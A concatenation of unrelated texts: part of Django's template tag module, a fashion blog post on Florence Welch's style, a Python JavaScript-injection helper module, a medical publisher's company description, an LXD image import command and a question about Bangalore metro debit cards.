return ''
class IfEqualNode(Node):
def __init__(self, var1, var2, nodelist_true, nodelist_false, negate):
self.var1, self.var2 = Variable(var1), Variable(var2)
self.nodelist_true, self.nodelist_false = nodelist_true, nodelist_false
self.negate = negate
def __repr__(self):
return "<IfEqualNode>"
def render(self, context):
try:
val1 = self.var1.resolve(context)
except VariableDoesNotExist:
val1 = None
try:
val2 = self.var2.resolve(context)
except VariableDoesNotExist:
val2 = None
if (self.negate and val1 != val2) or (not self.negate and val1 == val2):
return self.nodelist_true.render(context)
return self.nodelist_false.render(context)
class IfNode(Node):
def __init__(self, bool_exprs, nodelist_true, nodelist_false, link_type):
self.bool_exprs = bool_exprs
self.nodelist_true, self.nodelist_false = nodelist_true, nodelist_false
self.link_type = link_type
def __repr__(self):
return "<If node>"
def __iter__(self):
for node in self.nodelist_true:
yield node
for node in self.nodelist_false:
yield node
def get_nodes_by_type(self, nodetype):
nodes = []
if isinstance(self, nodetype):
nodes.append(self)
nodes.extend(self.nodelist_true.get_nodes_by_type(nodetype))
nodes.extend(self.nodelist_false.get_nodes_by_type(nodetype))
return nodes
def render(self, context):
if self.link_type == IfNode.LinkTypes.or_:
for ifnot, bool_expr in self.bool_exprs:
try:
value = bool_expr.resolve(context, True)
except VariableDoesNotExist:
value = None
if (value and not ifnot) or (ifnot and not value):
return self.nodelist_true.render(context)
return self.nodelist_false.render(context)
else:
for ifnot, bool_expr in self.bool_exprs:
try:
value = bool_expr.resolve(context, True)
except VariableDoesNotExist:
value = None
if not ((value and not ifnot) or (ifnot and not value)):
return self.nodelist_false.render(context)
return self.nodelist_true.render(context)
class LinkTypes:
and_ = 0,
or_ = 1
class RegroupNode(Node):
def __init__(self, target, expression, var_name):
self.target, self.expression = target, expression
self.var_name = var_name
def render(self, context):
obj_list = self.target.resolve(context, True)
if obj_list == None:
# target variable wasn't found in context; fail silently.
context[self.var_name] = []
return ''
# List of dictionaries in the format:
# {'grouper': 'key', 'list': [list of contents]}.
context[self.var_name] = [
{'grouper': key, 'list': list(val)}
for key, val in
groupby(obj_list, lambda v, f=self.expression.resolve: f(v, True))
]
return ''
def include_is_allowed(filepath):
for root in settings.ALLOWED_INCLUDE_ROOTS:
if filepath.startswith(root):
return True
return False
class SsiNode(Node):
def __init__(self, filepath, parsed):
self.filepath, self.parsed = filepath, parsed
def render(self, context):
if not include_is_allowed(self.filepath):
if settings.DEBUG:
return "[Didn't have permission to include file]"
else:
return '' # Fail silently for invalid includes.
try:
fp = open(self.filepath, 'r')
output = fp.read()
fp.close()
except IOError:
output = ''
if self.parsed:
try:
t = Template(output, name=self.filepath)
return t.render(context)
except TemplateSyntaxError, e:
if settings.DEBUG:
return "[Included template had syntax error: %s]" % e
else:
return '' # Fail silently for invalid included templates.
return output
class LoadNode(Node):
def render(self, context):
return ''
class NowNode(Node):
def __init__(self, format_string):
self.format_string = format_string
def render(self, context):
from datetime import datetime
from django.utils.dateformat import DateFormat
df = DateFormat(datetime.now())
return df.format(self.format_string)
class SpacelessNode(Node):
def __init__(self, nodelist):
self.nodelist = nodelist
def render(self, context):
from django.utils.html import strip_spaces_between_tags
return strip_spaces_between_tags(self.nodelist.render(context).strip())
class TemplateTagNode(Node):
mapping = {'openblock': BLOCK_TAG_START,
'closeblock': BLOCK_TAG_END,
'openvariable': VARIABLE_TAG_START,
'closevariable': VARIABLE_TAG_END,
'openbrace': SINGLE_BRACE_START,
'closebrace': SINGLE_BRACE_END,
'opencomment': COMMENT_TAG_START,
'closecomment': COMMENT_TAG_END,
}
def __init__(self, tagtype):
self.tagtype = tagtype
def render(self, context):
return self.mapping.get(self.tagtype, '')
class URLNode(Node):
def __init__(self, view_name, args, kwargs):
self.view_name = view_name
self.args = args
self.kwargs = kwargs
def render(self, context):
from django.core.urlresolvers import reverse, NoReverseMatch
args = [arg.resolve(context) for arg in self.args]
kwargs = dict([(smart_str(k,'ascii'), v.resolve(context))
for k, v in self.kwargs.items()])
try:
return reverse(self.view_name, args=args, kwargs=kwargs)
except NoReverseMatch:
try:
project_name = settings.SETTINGS_MODULE.split('.')[0]
return reverse(project_name + '.' + self.view_name,
args=args, kwargs=kwargs)
except NoReverseMatch:
return ''
class WidthRatioNode(Node):
def __init__(self, val_expr, max_expr, max_width):
self.val_expr = val_expr
self.max_expr = max_expr
self.max_width = max_width
def render(self, context):
try:
value = self.val_expr.resolve(context)
maxvalue = self.max_expr.resolve(context)
except VariableDoesNotExist:
return ''
try:
value = float(value)
maxvalue = float(maxvalue)
ratio = (value / maxvalue) * int(self.max_width)
except (ValueError, ZeroDivisionError):
return ''
return str(int(round(ratio)))
class WithNode(Node):
def __init__(self, var, name, nodelist):
self.var = var
self.name = name
self.nodelist = nodelist
def __repr__(self):
return "<WithNode>"
def render(self, context):
val = self.var.resolve(context)
context.push()
context[self.name] = val
output = self.nodelist.render(context)
context.pop()
return output
#@register.tag
def autoescape(parser, token):
"""
Force autoescape behaviour for this block.
"""
args = token.contents.split()
if len(args) != 2:
raise TemplateSyntaxError("'Autoescape' tag requires exactly one argument.")
arg = args[1]
if arg not in (u'on', u'off'):
raise TemplateSyntaxError("'Autoescape' argument should be 'on' or 'off'")
nodelist = parser.parse(('endautoescape',))
parser.delete_first_token()
return AutoEscapeControlNode((arg == 'on'), nodelist)
autoescape = register.tag(autoescape)
#@register.tag
def comment(parser, token):
"""
Ignores everything between ``{% comment %}`` and ``{% endcomment %}``.
"""
parser.skip_past('endcomment')
return CommentNode()
comment = register.tag(comment)
#@register.tag
def cycle(parser, token):
"""
Cycles among the given strings each time this tag is encountered.
Within a loop, cycles among the given strings each time through
the loop::
{% for o in some_list %}
<tr class="{% cycle 'row1' 'row2' %}">
...
</tr>
{% endfor %}
Outside of a loop, give the values a unique name the first time you call
it, then use that name each sucessive time through::
<tr class="{% cycle 'row1' 'row2' 'row3' as rowcolors %}">...</tr>
<tr class="{% cycle rowcolors %}">...</tr>
<tr class="{% cycle rowcolors %}">...</tr>
You can use any number of values, separated by spaces. Commas can also
be used to separate values; if a comma is used, the cycle values are
interpreted as literal strings.
"""
# Note: This returns the exact same node on each {% cycle name %} call;
# that is, the node object returned from {% cycle a b c as name %} and the
# one returned from {% cycle name %} are the exact same object. This
# shouldn't cause problems (heh), but if it does, now you know.
#
# Ugly hack warning: This stuffs the named template dict into parser so
# that names are only unique within each template (as opposed to using
# a global variable, which would make cycle names have to be unique across
# *all* templates.
args = token.split_contents()
if len(args) < 2:
raise TemplateSyntaxError("'cycle' tag requires at least two arguments")
if ',' in args[1]:
# Backwards compatibility: {% cycle a,b %} or {% cycle a,b as foo %}
# case.
args[1:2] = ['"%s"' % arg for arg in args[1].split(",")]
if len(args) == 2:
# {% cycle foo %} case.
name = args[1]
if not hasattr(parser, '_namedCycleNodes'):
raise TemplateSyntaxError("No named cycles in template. '%s' is not defined" % name)
if not name in parser._namedCycleNodes:
raise TemplateSyntaxError("Named cycle '%s' does not exist" % name)
return parser._namedCycleNodes[name]
if len(args) > 4 and args[-2] == 'as':
name = args[-1]
node = CycleNode(args[1:-2], name)
if not hasattr(parser, '_namedCycleNodes'):
parser._namedCycleNodes = {}
parser._namedCycleNodes[name] = node
else:
node = CycleNode(args[1:])
return node
cycle = register.tag(cycle)
def debug(parser, token):
"""
Outputs a whole load of debugging information, including the current
context and imported modules.
Sample usage::
<pre>
{% debug %}
</pre>
"""
return DebugNode()
debug = register.tag(debug)
#@register.tag(name="filter")
def do_filter(parser, token):
"""
Filters the contents of the block through variable filters.
Filters can also be piped through each other, and they can have
arguments -- just like in variable syntax.
Sample usage::
{% filter force_escape|lower %}
This text will be HTML-escaped, and will appear in lowercase.
{% endfilter %}
"""
_, rest = token.contents.split(None, 1)
filter_expr = parser.compile_filter("var|%s" % (rest))
for func, unused in filter_expr.filters:
if getattr(func, '_decorated_function', func).__name__ in ('escape', 'safe'):
raise TemplateSyntaxError('"filter %s" is not permitted. Use the "autoescape" tag instead.' % func.__name__)
nodelist = parser.parse(('endfilter',))
parser.delete_first_token()
return FilterNode(filter_expr, nodelist)
do_filter = register.tag("filter", do_filter)
#@register.tag
def firstof(parser, token):
"""
Outputs the first variable passed that is not False.
Outputs nothing if all the passed variables are False.
Sample usage::
{% firstof var1 var2 var3 %}
This is equivalent to::
{% if var1 %}
{{ var1 }}
{% else %}{% if var2 %}
{{ var2 }}
{% else %}{% if var3 %}
{{ var3 }}
{% endif %}{% endif %}{% endif %}
but obviously much cleaner!
You can also use a literal string as a fallback value in case all
passed variables are False::
{% firstof var1 var2 var3 "fallback value" %}
"""
bits = token.split_contents()[1:]
if len(bits) < 1:
raise TemplateSyntaxError("'firstof' statement requires at least one"
" argument")
return FirstOfNode(bits)
firstof = register.tag(firstof)
#@register.tag(name="for")
def do_for(parser, token):
"""
Loops over each item in an array.
For example, to display a list of athletes given ``athlete_list``::
<ul>
{% for athlete in athlete_list %}
<li>{{ athlete.name }}</li>
{% endfor %}
</ul>
You can loop over a list in reverse by using
``{% for obj in list reversed %}``.
You can also unpack multiple values from a two-dimensional array::
{% for key,value in dict.items %}
{{ key }}: {{ value }}
{% endfor %}
The for loop sets a number of variables available within the loop:
========================== ================================================
Variable Description
========================== ================================================
``forloop.counter`` The current iteration of the loop (1-indexed)
``forloop.counter0`` The current iteration of the loop (0-indexed)
``forloop.revcounter`` The number of iterations from the end of the
loop (1-indexed)
``forloop.revcounter0`` The number of iterations from the end of the
loop (0-indexed)
``forloop.first`` True if this is the first time through the loop
``forloop.last`` True if this is the last time through the loop
``forloop.parentloop`` For nested loops, this is the loop "above" the
current one
========================== ================================================
"""
bits = token.contents.split()
if len(bits) < 4:
raise TemplateSyntaxError("'for' statements should have at least four"
" words: %s" % token.contents)
is_reversed = bits[-1] == 'reversed'
in_index = is_reversed and -3 or -2
if bits[in_index] != 'in':
raise TemplateSyntaxError("'for' statements should use the format"
" 'for x in y': %s" % token.contents)
loopvars = re.sub(r' *, *', ',', ' '.join(bits[1:in_index])).split(',')
for var in loopvars:
if not var or ' ' in var:
raise TemplateSyntaxError("'for' tag received an invalid argument:"
" %s" % token.contents)
sequence = parser.compile_filter(bits[in_index+1])
nodelist_loop = parser.parse(('endfor',))
parser.delete_first_token()
return ForNode(loopvars, sequence, is_reversed, nodelist_loop)
do_for = register.tag("for", do_for)
def do_ifequal(parser, token, negate):
bits = list(token.split_contents())
if len(bits) != 3:
raise TemplateSyntaxError, "%r takes two arguments" % bits[0]
end_tag = 'end' + bits[0]
nodelist_true = parser.parse(('else', end_tag))
token = parser.next_token()
if token.contents == 'else':
nodelist_false = parser.parse((end_tag,))
parser.delete_first_token()
else:
nodelist_false = NodeList()
return IfEqualNode(bits[1], bits[2], nodelist_true, nodelist_false, negate)
#@register.tag
def ifequal(parser, token):
"""
Outputs the contents of the block if the two arguments equal each other.
Examples::
{% ifequal user.id comment.user_id %}
...
{% endifequal %}
{% ifnotequal user.id comment.user_id %}
...
{% else %}
...
{% endifnotequal %}
"""
return do_ifequal(parser, token, False)
ifequal = register.tag(ifequal)
#@register.tag
def ifnotequal(parser, token):
"""
Outputs the contents of the block if the two arguments are not equal.
See ifequal.
"""
return do_ifequal(parser, token, True)
ifnotequal = register.tag(ifnotequal)
#@register.tag(name="if")
def do_if(parser, token):
"""
The ``{% if %}`` tag evaluates a variable, and if that variable is "true"
(i.e., exists, is not empty, and is not a false boolean value), the
contents of the block are output:
::
{% if athlete_list %}
Number of athletes: {{ athlete_list|count }}
{% else %}
No athletes.
{% endif %}
In the above, if ``athlete_list`` is not empty, the number of athletes will
be displayed by the ``{{ athlete_list|count }}`` variable.
As you can see, the ``if`` tag can take an option ``{% else %}`` clause
that will be displayed if the test fails.
``if`` tags may use ``or``, ``and`` or ``not`` to test a number of
variables or to negate a given variable::
{% if not athlete_list %}
There are no athletes.
{% endif %}
{% if athlete_list or coach_list %}
There are some athletes or some coaches.
{% endif %}
{% if athlete_list and coach_list %}
Both atheletes and coaches are available.
{% endif %}
{% if not athlete_list or coach_list %}
There are no athletes, or there are some coaches.
{% endif %}
{% if athlete_list and not coach_list %}
There are some athletes and absolutely no coaches.
{% endif %}
``if`` tags do not allow ``and`` and ``or`` clauses with the same tag,
because the order of logic would be ambigous. For example, this is
invalid::
{% if athlete_list and coach_list or cheerleader_list %}
If you need to combine ``and`` and ``or`` to do advanced logic, just use
nested if tags. For example::
{% if athlete_list %}
{% if coach_list or cheerleader_list %}
We have athletes, and either coaches or cheerleaders!
{% endif %}
{% endif %}
"""
bits = token.contents.split()
del bits[0]
if not bits:
raise TemplateSyntaxError("'if' statement requires at least one argument")
# Bits now looks something like this: ['a', 'or', 'not', 'b', 'or', 'c.d']
bitstr = ' '.join(bits)
boolpairs = bitstr.split(' and ')
boolvars = []
if len(boolpairs) == 1:
link_type = IfNode.LinkTypes.or_
boolpairs = bitstr.split(' or ')
else:
link_type = IfNode.LinkTypes.and_
if ' or ' in bitstr:
raise TemplateSyntaxError, "'if' tags can't mix 'and' and 'or'"
for boolpair in boolpairs:
if ' ' in boolpair:
try:
not_, boolvar = boolpair.split()
except ValueError:
raise TemplateSyntaxError, "'if' statement improperly formatted"
if not_ != 'not':
raise TemplateSyntaxError, "Expected 'not' in if statement"
boolvars.append((True, parser.compile_filter(boolvar)))
else:
boolvars.append((False, parser.compile_filter(boolpair)))
nodelist_true = parser.parse(('else', 'endif'))
token = parser.next_token()
if token.contents == 'else':
nodelist_false = parser.parse(('endif',))
parser.delete_first_token()
else:
nodelist_false = NodeList()
return IfNode(boolvars, nodelist_true, nodelist_false, link_type)
do_if = register.tag("if", do_if)
#@register.tag
def ifchanged(parser, token):
"""
Checks if a value has changed from the last iteration of a loop.
The 'ifchanged' block tag is used within a loop. It has two possible uses.
1. Checks its own rendered contents against its previous state and only
displays the content if it has changed. For example, this displays a
list of days, only displaying the month if it changes::
<h1>Archive for {{ year }}</h1>
{% for date in days %}
{% ifchanged %}<h3>{{ date|date:"F" }}</h3>{% endifchanged %}
<a href="{{ date|date:"M/d"|lower }}/">{{ date|date:"j" }}</a>
{% endfor %}
2. If given a variable, check whether that variable has changed.
For example, the following shows the date every time it changes, but
only shows the hour if both the hour and the date have changed::
{% for date in days %}
{% ifchanged date.date %} {{ date.date }} {% endifchanged %}
{% ifchanged date.hour date.date %}
{{ date.hour }}
{% endifchanged %}
{% endfor %}
"""
bits = token.contents.split()
nodelist_true = parser.parse(('else', 'endifchanged'))
token = parser.next_token()
if token.contents == 'else':
nodelist_false = parser.parse(('endifchanged',))
parser.delete_first_token()
else:
nodelist_false = NodeList()
return IfChangedNode(nodelist_true, nodelist_false, *bits[1:])
ifchanged = register.tag(ifchanged)
#@register.tag
def ssi(parser, token):
"""
Outputs the contents of a given file into the page.
Like a simple "include" tag, the ``ssi`` tag includes the contents
of another file -- which must be specified using an absolute path --
in the current page::
{% ssi /home/html/ljworld.com/includes/right_generic.html %}
If the optional "parsed" parameter is given, the contents of the included
file are evaluated as template code, with the current context::
{% ssi /home/html/ljworld.com/includes/right_generic.html parsed %}
"""
bits = token.contents.split()
parsed = False
if len(bits) not in (2, 3):
raise TemplateSyntaxError("'ssi' tag takes one argument: the path to"
" the file to be included")
if len(bits) == 3:
if bits[2] == 'parsed':
parsed = True
else:
raise TemplateSyntaxError("Second (optional) argument to %s tag"
" must be 'parsed'" % bits[0])
return SsiNode(bits[1], parsed)
ssi = register.tag(ssi)
#@register.tag
def load(parser, token):
"""
Loads a custom template tag set.
For example, to load the template tags in
``django/templatetags/news/photos.py``::
{% load news.photos %}
"""
bits = token.contents.split()
for taglib in bits[1:]:
# add the library to the parser
try:
lib = get_library("django.templatetags.%s" % taglib)
parser.add_library(lib)
except InvalidTemplateLibrary, e:
raise TemplateSyntaxError("'%s' is not a valid tag library: %s" %
(taglib, e))
return LoadNode()
load = register.tag(load)
#@register.tag
def now(parser, token):
"""
Displays the date, formatted according to the given string.
Uses the same format as PHP's ``date()`` function; see http://php.net/date
for all the possible values.
Sample usage::
It is {% now "jS F Y H:i" %}
"""
bits = token.contents.split('"')
if len(bits) != 3:
raise TemplateSyntaxError, "'now' statement takes one argument"
format_string = bits[1]
return NowNode(format_string)
now = register.tag(now)
#@register.tag
def regroup(parser, token):
"""
Regroups a list of alike objects by a common attribute.
This complex tag is best illustrated by use of an example: say that
``people`` is a list of ``Person`` objects that have ``first_name``,
``last_name``, and ``gender`` attributes, and you'd like to display a list
that looks like:
* Male:
* George Bush
* Bill Clinton
* Female:
* Margaret Thatcher
* Colendeeza Rice
* Unknown:
* Pat Smith
The following snippet of template code would accomplish this dubious task::
{% regroup people by gender as grouped %}
<ul>
{% for group in grouped %}
<li>{{ group.grouper }}
<ul>
{% for item in group.list %}
<li>{{ item }}</li>
{% endfor %}
</ul>
{% endfor %}
</ul>
As you can see, ``{% regroup %}`` populates a variable with a list of
objects with ``grouper`` and ``list`` attributes. ``grouper`` contains the
item that was grouped by; ``list`` contains the list of objects that share
that ``grouper``. In this case, ``grouper`` would be ``Male``, ``Female``
and ``Unknown``, and ``list`` is the list of people with those genders.
Note that `{% regroup %}`` does not work when the list to be grouped is not
sorted by the key you are grouping by! This means that if your list of
people was not sorted by gender, you'd need to make sure it is sorted
before using it, i.e.::
{% regroup people|dictsort:"gender" by gender as grouped %}
"""
firstbits = token.contents.split(None, 3)
if len(firstbits) != 4:
raise TemplateSyntaxError, "'regroup' tag takes five arguments"
target = parser.compile_filter(firstbits[1])
if firstbits[2] != 'by':
raise TemplateSyntaxError("second argument to 'regroup' tag must be 'by'")
lastbits_reversed = firstbits[3][::-1].split(None, 2)
if lastbits_reversed[1][::-1] != 'as':
raise TemplateSyntaxError("next-to-last argument to 'regroup' tag must"
" be 'as'")
expression = parser.compile_filter(lastbits_reversed[2][::-1])
var_name = lastbits_reversed[0][::-1]
return RegroupNode(target, expression, var_name)
regroup = register.tag(regroup)
def spaceless(parser, token):
"""
Removes whitespace between HTML tags, including tab and newline characters.
Example usage::
{% spaceless %}
<p>
<a href="foo/">Foo</a>
</p>
{% endspaceless %}
This example would return this HTML::
<p><a href="foo/">Foo</a></p>
Only space between *tags* is normalized -- not space between tags and text.
In this example, the space around ``Hello`` won't be stripped::
{% spaceless %}
<strong>
Hello
</strong>
{% endspaceless %}
"""
nodelist = parser.parse(('endspaceless',))
parser.delete_first_token()
return SpacelessNode(nodelist)
spaceless = register.tag(spaceless)
#@register.tag
def templatetag(parser, token):
"""
Outputs one of the bits used to compose template tags.
Since the template system has no concept of "escaping", to display one of
the bits used in template tags, you must use the ``{% templatetag %}`` tag.
The argument tells which template bit to output:
================== =======
Argument Outputs
================== =======
``openblock`` ``{%``
``closeblock`` ``%}``
``openvariable`` ``{{``
``closevariable`` ``}}``
``openbrace`` ``{``
``closebrace`` ``}``
``opencomment`` ``{#``
``closecomment`` ``#}``
================== =======
"""
bits = token.contents.split()
if len(bits) != 2:
raise TemplateSyntaxError, "'templatetag' statement takes one argument"
tag = bits[1]
if tag not in TemplateTagNode.mapping:
raise TemplateSyntaxError("Invalid templatetag argument: '%s'."
" Must be one of: %s" %
(tag, TemplateTagNode.mapping.keys()))
return TemplateTagNode(tag)
templatetag = register.tag(templatetag)
def url(parser, token):
"""
Returns an absolute URL matching given view with its parameters.
This is a way to define links that aren't tied to a particular URL
configuration::
{% url path.to.some_view arg1,arg2,name1=value1 %}
The first argument is a path to a view. It can be an absolute python path
or just ``app_name.view_name`` without the project name if the view is
located inside the project. Other arguments are comma-separated values
that will be filled in place of positional and keyword arguments in the
URL. All arguments for the URL should be present.
For example if you have a view ``app_name.client`` taking client's id and
the corresponding line in a URLconf looks like this::
('^client/(\d+)/$', 'app_name.client')
and this app's URLconf is included into the project's URLconf under some
path::
('^clients/', include('project_name.app_name.urls'))
then in a template you can create a link for a certain client like this::
{% url app_name.client client.id %}
The URL will look like ``/clients/client/123/``.
"""
bits = token.contents.split(' ', 2)
if len(bits) < 2:
raise TemplateSyntaxError("'%s' takes at least one argument"
" (path to a view)" % bits[0])
args = []
kwargs = {}
if len(bits) > 2:
for arg in bits[2].split(','):
if '=' in arg:
k, v = arg.split('=', 1)
k = k.strip()
kwargs[k] = parser.compile_filter(v)
else:
args.append(parser.compile_filter(arg))
return URLNode(bits[1], args, kwargs)
url = register.tag(url)
#@register.tag
def widthratio(parser, token):
"""
For creating bar charts and such, this tag calculates the ratio of a given
value to a maximum value, and then applies that ratio to a constant.
For example::
<img src='bar.gif' height='10' width='{% widthratio this_value max_value 100 %}' />
Above, if ``this_value`` is 175 and ``max_value`` is 200, the the image in
the above example will be 88 pixels wide (because 175/200 = .875;
.875 * 100 = 87.5 which is rounded up to 88).
"""
bits = token.contents.split()
if len(bits) != 4:
raise TemplateSyntaxError("widthratio takes three arguments")
tag, this_value_expr, max_value_expr, max_width = bits
try:
max_width = int(max_width)
except ValueError:
raise TemplateSyntaxError("widthratio final argument must be an integer")
return WidthRatioNode(parser.compile_filter(this_value_expr),
parser.compile_filter(max_value_expr), max_width)
widthratio = register.tag(widthratio)
#@register.tag
def do_with(parser, token):
"""
Adds a value to the context (inside of this block) for caching and easy
access.
For example::
{% with person.some_sql_method as total %}
{{ total }} object{{ total|pluralize }}
{% endwith %}
"""
bits = list(token.split_contents())
if len(bits) != 4 or bits[2] != "as":
raise TemplateSyntaxError("%r expected format is 'value as name'" %
bits[0])
var = parser.compile_filter(bits[1])
name = bits[3]
nodelist = parser.parse(('endwith',))
parser.delete_first_token()
return WithNode(var, name, nodelist)
do_with = register.tag('with', do_with)
|
Hello all! Here is the latest Style Crush post, featuring Florence Welch. I’ve chosen this look as I think it is very typical of her and, me being me, I love all the vintage inspired pieces she wears. This look is probably like Marmite. You will either love it or hate it. I am in the ‘Love’ half of the audience and I think she pulls it off brilliantly. The only thing that I’m not too keen on is her hair. I normally love her red flowing locks, but this to me personally is a little too orange, and the style is very ageing on her. However that’s not we’re here to admire, so onto the outfit!
I really like the clashing prints of paisley and vintage check, and the attention to detail. Such as the lace trim of the skirt, the suspender tights and the trilby hat. Everything just seems to work in a weird way.
Here is my take on the outfit. I couldn’t find a suitable printed cardigan that I felt resembles Florence’s, so I’ve gone for a simple shrug in a similar shade.
The items pictured were found at Topshop, New Look, Urban Outfitters, Rokit, Miss Selfridge and Topman.
What do you think of Florence’s style?
I’ll be back tomorrow with some photos from a recent shoot I styled.
yay thanks for doing this post i love it!
I love this outfit on Florence, she pulls it off like no one else could!
|
import os.path
import os
from document import *
from module import *
def moduledir():
return os.path.dirname(os.path.abspath(__file__))
hidden = Marker("hidden")
# Modules: ( name, marker, [ (marker,[insert before marker,...] ), (marker,...), ...] )
jsm = Marker("js")
# Modules: ( name, marker, [ (marker,[insert before marker,...] ), (marker,...), ...] )
jsModule = Module("js",jsm,[("head",["<script language='JavaScript'> /* <![CDATA[ */\n",jsm,"//]]>\n</script>\n"]) ])
AnOlderToggleShowImpl = """
function toggleShow(itemId){
var ctnt = document.getElementById(itemId);
curStyle = ctnt.getAttribute("style");
if (curStyle == 'display: none;') {
ctnt.setAttribute("style",ctnt.getAttribute("origstyle"));
}
else {
ctnt.setAttribute("origstyle",ctnt.getAttribute("style"));
ctnt.setAttribute("style","display: none;");
}
}
"""
showHideModule = Module("showhide",hidden, [("js",["""function toggleShow(itemId) {
var ctnt = document.getElementById(itemId);
if ((ctnt.style.display == "none") || (ctnt.style.display == "")) {
if (ctnt.getAttribute("actualdisplay"))
ctnt.style.display = ctnt.getAttribute("actualdisplay");
else
ctnt.style.display = "block";
}
else {
ctnt.setAttribute("actualdisplay",ctnt.style.display);
ctnt.style.display = "none";
}
}
function SwapContent(contentId, toId, hideId){
var ctnt = document.getElementById(contentId);
var hide = document.getElementById(hideId) ;
var tgt = document.getElementById(toId);
kids = tgt.childNodes;
for (var i = 0; i < kids.length; i++) {
hide.appendChild(kids[i]);
}
tgt.appendChild(ctnt);
}
function MoveContent(contentId,toId){
var ctnt = document.getElementById(contentId);
var tgt = document.getElementById(toId);
tgt.appendChild(ctnt);
}
function CopyContent(contentId,toId,remExisting){
var ctnt = document.getElementById(contentId);
var tgt = document.getElementById(toId);
var copy = ctnt.cloneNode(true);
copy.removeAttribute('id');
if (remExisting) while( tgt.hasChildNodes() ) { tgt.removeChild( tgt.lastChild ); }
tgt.appendChild(copy);
}
"""] ),
("style",["#hidden { display:none }\n"]),("body",["<div id='hidden'>",hidden,"</div>"]) ])
# ("style",["#hidden { position:absolute; bottom:0px ; right:0px ; height:1px ; width:1px ; z-index:-10000 ; overflow:hidden; clip:auto }\n"]),("body",["<div id='hidden'>",hidden,"</div>"]) ])
delayLoadModule = Module("delayLoad",None,[("js",["""
function delayLoadImg(imId,href){
var img = document.getElementById(imId);
img.src = href;
}
"""])])
faderModule = Module("delayLoad",None,[("js",[file(moduledir() + os.sep + "fader.js","r").read()])])
""" Example use of styleRow
<tr>
<td>
<div onClick="styleRow(this,'background-color:red')">
New
</div>
</td>
</tr>
"""
styleRowModule = Module("styleRow",None,[("js",["""
function styleRow(elemInRow,newStyle){
var row = elemInRow;
while ((row != document)&&(row.tagName != "TR")) { row = row.parentNode; }
if (row != document) row.setAttribute('style', newStyle);
}
"""])])
newRowModule = Module("newRow",None,[("js",["""
function newRow(anyElemInTable,budId){
var table = anyElemInTable;
while ((table != document)&&(table.tagName != "TABLE")) { table = table.parentNode; }
if (table != document) {
var copy = document.getElementById(budId).cloneNode(true);
copy.removeAttribute('id');
table.appendChild(copy);
}
}
"""])])
""" Example use of makeEditable: note I have to removeAttribute('onClick'), or when you click to edit it will make another.
<form>
<table><tr>
<td onClick="this.removeAttribute('onClick'); makeEditable(this,'textbox1')">
New Hampshire
</td>
</tr>
</table>
<input id='textbox1' name="Start" type="text" value="Start" />
</form>
"""
makeEditableModule = Module("makeEditable",None,[("js",[r"""
function makeEditable(elem,editBoxBudId, newId){
var newEditBox = document.getElementById(editBoxBudId).cloneNode(true);
var data = elem.firstChild.data;
var i=0;
while ((data[i] == ' ')||(data[i] == '\n')) i++; /* Wipe preceding whitespace */
data = data.substring(i,data.length);
newEditBox.setAttribute('value',data);
if (newId != "") newEditBox.setAttribute('id',newId);
newEditBox.setAttribute('name',newId);
elem.replaceChild(newEditBox, elem.firstChild);
newEditBox.focus();
}
"""])])
# styleRow(anyElemInTable,'background-color:blue')
|
Mediscript publishes an extensive range of medical/scientific publications for a wide spectrum of readership ranging from clinical and basic research scientists to consultants, general practitioners, pharmacists, medical representatives, nurses and patients. Over the last 30 years, our publications have covered a vast array of therapeutic fields, including oncology, virology, dermatology, HIV, hepatitis, respiratory medicine, cardiovascular disease, diabetes, gastroenterology, obesity, sport medicine, health and fitness. The company has established worldwide contacts throughout academia and medicine in all fields, particularly HIV disease.
Our services include writing, editing, literature scanning, abstracting, design, typesetting, artwork, print and production, translation and transcribing, conference planning, international freight and shipping and fulfilment of mailing lists, UK and worldwide. We work closely with a team of IT specialists for the design, construction and management of websites. Mediscript publications include journals, training programmes, product monographs, conference literature, newsletters, treatment guidelines and patient education material in a range of therapeutic conditions.
The company also has considerable experience in the organisation of conferences ranging from small Roundtables to satellite symposia and larger events of up to 1000 delegates. As an extension of our activities, we have worked with medical associations and learned societies and played a pivotal role in the setting up of the British HIV Association (BHIVA), the National HIV Nurses Association (NHIVNA) and the Children's HIV Association (CHIVA).
|
# -*- coding: utf-8 -*-
# Copyright (C) 2016 Matthias Luescher
#
# Authors:
# Matthias Luescher
#
# This file is part of edi.
#
# edi is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# edi is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with edi. If not, see <http://www.gnu.org/licenses/>.
import logging
import subprocess
from edi.commands.lxc import Lxc
from edi.commands.imagecommands.imagelxc import Lxc as LxcImageCommand
from edi.lib.shellhelpers import run
from edi.lib.helpers import print_success
class Import(Lxc):
@classmethod
def advertise(cls, subparsers):
help_text = "import an edi image into the LXD image store"
description_text = "Import an edi image into the LXD image store."
parser = subparsers.add_parser(cls._get_short_command_name(),
help=help_text,
description=description_text)
cls._require_config_file(parser)
def run_cli(self, cli_args):
self.run(cli_args.config_file)
def run(self, config_file):
self._setup_parser(config_file)
if self._is_in_image_store():
logging.info(("{0} is already in image store. "
"Delete it to regenerate it."
).format(self._result()))
return self._result()
image = LxcImageCommand().run(config_file)
print("Going to import lxc image into image store.")
self._import_image(image)
print_success("Imported lxc image into image store as {}.".format(self._result()))
return self._result()
def clean(self, config_file):
self._setup_parser(config_file)
if self._is_in_image_store():
logging.info(("Removing '{}' from image store."
).format(self._result()))
self._delete_image()
print_success("Removed {} from image store.".format(self._result()))
def _result(self):
return "{}_{}".format(self.config.get_project_name(),
self._get_command_file_name_prefix())
def _is_in_image_store(self):
cmd = []
cmd.append("lxc")
cmd.append("image")
cmd.append("show")
cmd.append("local:{}".format(self._result()))
result = run(cmd, check=False, stderr=subprocess.PIPE)
return result.returncode == 0
def _import_image(self, image):
cmd = []
cmd.append("lxc")
cmd.append("image")
cmd.append("import")
cmd.append(image)
cmd.append("local:")
cmd.extend(["--alias", self._result()])
run(cmd)
def _delete_image(self):
cmd = []
cmd.append("lxc")
cmd.append("image")
cmd.append("delete")
cmd.append("local:{}".format(self._result()))
run(cmd)
|
What is the threshold limit of Unifare Banglore Metro Platinum Debit Cards?
